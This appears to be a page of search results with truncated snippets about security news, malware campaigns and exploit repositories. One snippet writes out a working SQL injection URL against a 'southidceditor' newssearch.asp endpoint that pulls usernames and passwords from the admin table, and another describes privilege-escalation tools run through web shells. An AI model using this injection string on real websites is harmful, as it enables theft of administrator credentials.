26 matches found
Exploit-Framework
Exploit Framework. License: MIT...
CVE-s
It is an offensive tool for web exploitation. This repository ap...
New Cache Side Channel Attack Can De-Anonymize Targeted Online Users
A group of academics from the New Jersey Institute of Technology (NJIT) has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor. "An attacker who has complete or partial control over a website can learn whether a specific target i.e.,...
Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.
Welcome to the Wallarm weekly web exploits digest! Starting this week, we will publish weekly digests consisting of web exploits with CVSS scores higher than 5. They will be followed by explanations, risk analysis, related stories and news. So, here we go! The most sophisticated and interesting...
Qbot Trojan Reappears to Go After U.S. Banking Customers
Qbot, an ever-evolving information-stealing trojan that’s been around since 2008, has reappeared after a hiatus to target customers of U.S. financial institutions. Its latest variant features fresh capabilities to help it remain undetected. Qbot (a.k.a. Qakbot or Pinkslipbot) harvests browsing data...
penetration
This is a collection of 0-day exploits and vulnerabilities in various web applications, including CreateLive CMS, DVBBS, and others. The exploits are primarily SQL injection attacks, which allow an attacker to inject malicious SQL code into the database to extract or modify sensitive data. The...
USN-4202-1 thunderbird vulnerabilities
It was discovered that a specially crafted S/MIME message with an inner encryption layer could be displayed as having a valid signature in some circumstances, even if the signer had no access to the encrypted message. An attacker could potentially exploit this to spoof the message author...
Exploit for CVE-2013-0422
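K8tools 20190428 Disclaimer: These tools are for security research or authorized penetration testing only; you bear the consequences of any illegal use. Blog: https://www.cnblogs.com/k8gege Download: https://github.com/k8gege/K8tools PS: Updated irregularly; the files are fairly large, so download as needed. For tool bugs or suggestions, leave a message directly on GitHub. The privilege-escalation tools can all be run from a remote-control Cmd or a WebShell; most have been modified and recompiled for better compatibility and stability. Note: not guaranteed to remain available permanently; save your own copy if you like them. General tools + General tools K8飞刀Final.rar + K8data.mdb K8飞刀 vulnerability database 20190402 + K8expList.txt...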
Distributed Red Team Operations with Cobalt Strike
What if you could easily host malicious websites, send phishing emails, and manage compromised hosts across diverse internet addresses? This week's Cobalt Strike adds the ability to manage multiple attack servers at once. Here's how it works: When you connect to two or more servers, Cobalt Strike...
Bots, Zeus, Web Exploits: the Most Potent Threats of 2012
Every year it seems that security-related news advances further from its roots in national security circles, IT departments, and the antivirus industry into the mainstream consciousness. The period from July to the end of the year was no exception. However, despite a handful of flashy security stories, F-Secure...
Russian Web proxy with backdoors, Distributing malware
Antivirus company Symantec has detected a malicious campaign in which hackers managed to deceive thousands of people who had allegedly signed up for a paid proxy service. They report that hundreds of thousands of users signing up for a cheap and supposedly legitimate proxy service have ended up downloading...
ActivaDigital Cross Site Scripting
Exploit database separated by exploit type (local, remote, DoS, etc.). Official Website: http://www.1337day.com ...
Nor-Rec Cross Site Scripting
Exploit database separated by exploit type (local, remote, DoS, etc.). Official Website: http://www.1337day.com ...
Southern data editor (southidceditor) injection 0day vulnerabilities - vulnerability warning - the black bar safety net
Injection point: newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may be another version: newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...
Hacked WordPress Blogs Used to Poison Google Image Search
A researcher has found evidence of thousands of compromised WordPress blogs that are being used to insert malicious images into Google search results. The report, from the unmaskparasites.com blog, may be evidence of the aftereffects of a widespread attack on WordPress blogs reported last week, ...
Roboo : Most Advanced open-source HTTP Robot mitigator !
Roboo uses advanced non-interactive HTTP challenge/response mechanisms to detect and subsequently mitigate HTTP robots, by verifying the existence of HTTP, HTML, DOM, JavaScript and Flash stacks at the client side. Such a deep level of verification weeds out the larger percentage of HTTP robots whi...
Cisco: More Threats To Apple, Mobile Devices In 2011
Data suggests that 2010 was a year of “more of the same” when it comes to computer threats, but 2011 likely won’t be, at least according to networking giant Cisco Systems, which released its Annual Security Report on Wednesday. Cisco’s annual report on the state of security reiterated findings fr...
New Firefox Plug-In Will Defeat Flash Attacks
For years now, Adobe Flash files have been a very useful attack vector for hackers and a serious security problem for end users and IT departments. Now, a German researcher is planning to unveil a new browser plug-in designed to prevent many common types of Flash attacks. The plug-in, called...
Dojo Toolkit 1.4.1 - dohrunner.html Multiple Cross-Site Scripting Vulnerabilities
Source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues...
Cisco Defines Cybercrime ROI
The Cisco Cybercrime Return on Investment Matrix identifies the innovative and lucrative banking Trojan Zeus, as well as successful Web exploits that have dominated cybercrime as “rising stars.”